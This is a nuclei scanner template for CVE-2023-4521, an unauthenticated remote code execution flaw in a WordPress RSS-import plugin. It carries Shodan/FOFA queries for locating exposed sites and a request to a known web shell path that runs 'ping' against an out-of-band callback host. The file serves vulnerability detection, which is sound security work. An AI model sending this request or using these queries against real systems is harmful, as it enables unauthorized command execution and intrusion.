nuclei-templates/http/cves/2023/CVE-2023-4521.yaml

52 lines
1.8 KiB
YAML

id: CVE-2023-4521
info:
name: Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE
author: princechaddha
severity: critical
description: The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell.
impact: |
Allows unauthenticated attackers to execute arbitrary code on the target system.
remediation: |
Update the Import XML and RSS Feeds WordPress Plugin to the latest version to mitigate the vulnerability.
reference:
- https://wpscan.com/vulnerability/de2cdb38-3a9f-448e-b564-a798d1e93481
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-4521
epss-score: 0.03055
epss-percentile: 0.90979
cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: mooveagency
product: "import_xml_and_rss_feeds"
framework: wordpress
shodan-query: "http.html:\"import-xml-feed\""
fofa-query: "body=\"import-xml-feed\""
tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce,mooveagency
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Import XML and RSS Feeds'
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/import-xml-feed/uploads/169227090864de013cac47b.php?cmd=ping+{{interactsh-url}}"
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
# digest: 4a0a00473045022100a36f31ac5e2649a9bca8782a9c836439dc0c1707ed49b1d6dfb3320fbcef834d0220716dd0d57089d321834e7d979a7281d444a6e13b73d59902030b2237564cb4f6:922c64590222798bb761d5b6d8e72950